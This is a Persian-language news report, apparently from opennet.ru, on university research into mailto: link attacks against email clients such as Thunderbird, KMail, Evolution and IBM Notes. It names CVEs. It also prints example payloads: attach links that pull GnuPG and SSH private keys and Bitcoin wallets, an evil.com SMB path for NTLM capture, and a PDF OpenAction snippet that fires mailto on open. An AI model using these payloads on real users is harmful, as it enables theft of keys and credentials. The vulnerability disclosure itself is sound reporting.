محققان دانشگاه روهر بوخوم (آلمان) () رفتار کلاینت های ایمیل هنگام پردازش پیوندهای "mailto:" با پارامترهای پیشرفته. پنج مورد از بیست مشتری ایمیل مورد بررسی در برابر حمله ای آسیب پذیر بودند که جایگزینی منبع را با استفاده از پارامتر "ضمیمه" دستکاری می کرد. شش سرویس گیرنده ایمیل دیگر در برابر حمله جایگزینی کلید PGP و S/MIME آسیب پذیر بودند و سه سرویس گیرنده در برابر حمله برای استخراج محتوای پیام های رمزگذاری شده آسیب پذیر بودند.
پیوندهای «"برای خودکار کردن باز کردن یک سرویس گیرنده ایمیل به منظور نوشتن نامه ای به مخاطب مشخص شده در پیوند استفاده می شود. علاوه بر آدرس، می توانید پارامترهای اضافی را به عنوان بخشی از پیوند تعیین کنید، مانند موضوع نامه و یک الگو برای محتوای معمولی. حمله پیشنهادی پارامتر «اتصال» را دستکاری میکند، که به شما امکان میدهد پیوستی را به پیام تولید شده پیوست کنید.
کلاینت های ایمیل Thunderbird، GNOME Evolution (CVE-2020-11879)، KDE KMail (CVE-2020-11880)، IBM/HCL Notes (CVE-2020-4089) و Pegasus Mail در برابر یک حمله بی اهمیت آسیب پذیر بودند که به شما امکان می دهد به طور خودکار پیوست کنید. هر فایل محلی که از طریق پیوندی مانند "mailto:?attach=path_to_file" مشخص شده باشد. فایل بدون نمایش اخطار ضمیمه شده است، بنابراین بدون توجه خاص، کاربر ممکن است متوجه ارسال نامه به همراه ضمیمه نشود.
به عنوان مثال، با استفاده از پیوندی مانند "mailto:[ایمیل محافظت شده]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" می توانید کلیدهای خصوصی را از GnuPG در نامه وارد کنید. همچنین می توانید محتویات کیف پول های رمزنگاری شده (~/.bitcoin/wallet.dat)، کلیدهای SSH (~/.ssh/id_rsa) و هر فایلی را که در دسترس کاربر است ارسال کنید. علاوه بر این، Thunderbird به شما اجازه می دهد تا با استفاده از ساختارهایی مانند "attach=/tmp/*.txt" گروه هایی از فایل ها را با ماسک پیوست کنید.
علاوه بر فایلهای محلی، برخی از سرویس گیرندگان ایمیل، لینکهای ذخیرهسازی شبکه و مسیرهای موجود در سرور IMAP را پردازش میکنند. به طور خاص، IBM Notes به شما امکان میدهد هنگام پردازش پیوندهایی مانند «attach=\\evil.com\dummyfile»، فایلی را از دایرکتوری شبکه منتقل کنید و همچنین با ارسال پیوند به سرور SMB که توسط مهاجم کنترل میشود، پارامترهای احراز هویت NTLM را رهگیری کنید. (درخواست با کاربر پارامترهای احراز هویت فعلی ارسال خواهد شد).
Thunderbird با موفقیت درخواستهایی مانند «attach=imap:///fetch>UID>/INBOX>1/» را پردازش میکند، که به شما امکان میدهد محتوا را از پوشهها در سرور IMAP پیوست کنید. در همان زمان، پیام های بازیابی شده از IMAP، رمزگذاری شده از طریق OpenPGP و S/MIME، قبل از ارسال، به طور خودکار توسط سرویس گیرنده ایمیل رمزگشایی می شوند. توسعه دهندگان Thunderbird بودند در مورد مشکل در فوریه و در شماره مشکل قبلاً برطرف شده است (شاخه های 52، 60 و 68 تاندربرد آسیب پذیر هستند).
نسخه های قدیمی Thunderbird نیز در برابر دو نوع حمله دیگر به PGP و S/MIME که توسط محققان پیشنهاد شده بود آسیب پذیر بودند. به طور خاص، Thunderbird، و همچنین OutLook، PostBox، eM Client، MailMate و R2Mail2، در معرض یک حمله جایگزین کلید قرار گرفتند، که ناشی از این واقعیت است که سرویس گیرنده نامه به طور خودکار گواهیهای جدید ارسال شده در پیامهای S/MIME را وارد و نصب میکند، که این امکان را به شما میدهد. مهاجم برای سازماندهی جایگزینی کلیدهای عمومی که قبلاً توسط کاربر ذخیره شده است.
حمله دوم که Thunderbird، PostBox و MailMate در معرض آن هستند، ویژگیهای مکانیزم ذخیره خودکار پیامهای پیشنویس را دستکاری میکند و با استفاده از پارامترهای mailto اجازه میدهد تا رمزگشایی پیامهای رمزگذاریشده یا اضافه کردن یک امضای دیجیتال برای پیامهای دلخواه را آغاز کند. انتقال بعدی نتیجه به سرور IMAP مهاجم. در این حمله، متن رمز از طریق پارامتر «body» منتقل میشود و از تگ «meta refresh» برای برقراری تماس با سرور IMAP مهاجم استفاده میشود. مثلا: ' '
برای پردازش خودکار پیوندهای "mailto:" بدون تعامل کاربر، می توان از اسناد PDF طراحی شده ویژه استفاده کرد - عمل OpenAction در PDF به شما امکان می دهد هنگام باز کردن یک سند، کنترل کننده mailto را به طور خودکار راه اندازی کنید:
%PDF-1.5
1 0 ابج
<< /تایپ /کاتالوگ /OpenAction [2 0 R] >>
endobj
2 0 ابج
<< /تایپ /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endobj
منبع: opennet.ru